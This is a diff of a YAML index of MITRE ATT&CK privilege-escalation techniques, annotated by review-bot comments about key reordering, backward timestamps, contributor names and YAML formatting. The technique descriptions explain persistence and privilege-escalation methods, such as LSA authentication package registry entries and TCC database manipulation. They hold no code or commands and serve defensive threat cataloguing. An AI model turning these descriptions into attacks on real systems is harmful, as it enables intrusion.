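Review bot: this seventy-line removal is not a content deletion: the `id`, `type`, `created`, `created_by_ref`, contributors, platforms, domains and all twelve `external_references` for T1546.004 reappear in the later hunks for the same technique, only reordered, with `revoked: false` added and the `bencane blog bashrc` URL moved to a `web.archive.org` snapshot. The reorder makes the substantive change almost impossible to spot in review; if the generator emits keys in a stable order (for example dumping with sorted keys), the same update would be a handful of lines.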
@@ -22054,6 +22292,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -22064,9 +22306,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -22075,8 +22321,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
@@ -22122,7 +22427,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -22147,13 +22452,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
@@ -22233,7 +22536,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -22269,7 +22571,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -22292,12 +22594,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -22375,12 +22676,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22441,7 +22741,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -22485,7 +22784,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -22507,7 +22806,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -22588,7 +22886,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -22611,7 +22908,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -22641,12 +22938,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22731,7 +23026,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22796,7 +23090,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22871,7 +23164,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22899,7 +23192,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22930,7 +23222,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22973,12 +23265,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22995,7 +23285,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
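Review bot: the contributor entry is changed from `Alexander Rodchenko` to `Rodchenko Aleksandr`, which puts the surname first, while the T1078 hunk earlier in this diff corrects `Goldstein Menachem` to `Menachem Goldstein`, the opposite direction. Please confirm which form the contributor asked for so the index does not apply two conventions to the same kind of fix.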
@@ -23054,7 +23344,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -23136,12 +23425,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -23238,7 +23526,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -23352,7 +23639,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -23422,7 +23708,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -23450,7 +23735,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23494,8 +23779,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -23531,7 +23814,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23550,12 +23833,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23605,12 +23887,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23643,9 +23924,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
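Review bot: splitting `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into two entries leaves the `(Gurucul)` affiliation only on `Nilesh Dherange (Gurucul)` and none on `Naveen Vijayaraghavan`; if both contributors shared the affiliation in the original combined entry, the second should keep it. Confirm against the upstream contributor list before merging.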
@@ -23662,9 +23944,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
@@ -23710,38 +23991,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
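Review bot: the new `description: |+` block for T1548.006 depends on the blank line before `kill_chain_phases` to reproduce the trailing newline the old double-quoted string ended with, so any editor or pre-commit hook that strips trailing whitespace will silently change the value; a `|` or `|-` scalar would be more robust if the trailing newline is not significant downstream. In the same block, "an overwrites file (if connected to an MDM)" reads like a typo for "overrides file"; since this text mirrors upstream ATT&CK, raise it upstream rather than hand-editing here. This hunk also drops `spec_version: '2.1'` from T1098.002, and the same removal recurs for every entry in this diff; check that nothing consuming the index keys off that field before merging.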
@@ -23749,6 +24011,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
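Review bot: `x_mitre_detection: ''` stays empty for T1548.006 even though the rewritten description above now names concrete observables (the `TCC.db` path, the SIP-disabled condition, and loading a substitute database through environment variables and `launchctl`), and the data sources listed in the next hunk already include `File: File Modification`. The empty value is upstream content, but it is worth an upstream issue rather than being carried forward unchanged; the two added contributor lines are fine.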
@@ -23756,7 +24020,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23786,7 +24050,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23832,7 +24095,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
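Review bot: the `modified` timestamp for T1055.008 moves backward, from '2022-04-25T14:00:00.188Z' to '2021-10-18T12:26:31.766Z', and the same backward move recurs below for T1037.001, T1547.008, T1546.007, T1574.004 and T1574.012. A regeneration from a newer bundle should not yield earlier timestamps; most of the old values share the `14:00:00.188Z` time-of-day, which looks like an earlier batch rewrite that the new values replace with the objects' real timestamps, but verify which bundle version was used before merging so the index is not reverting to stale data.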
@@ -23877,8 +24140,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
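Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1055.008 without replacing the latter, so the entry ends up with no `x_mitre_attack_spec_version` key at all, and the same happens to T1037.001 and T1574.012 further down, while other entries keep the key (T1547.008 stays at 2.1.0) or bump it (T1078.003 goes to 3.2.0). Check whether the generator intentionally omits the key when the upstream object lacks it, or whether a field was lost during regeneration.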
@@ -23904,7 +24165,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23930,59 +24191,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
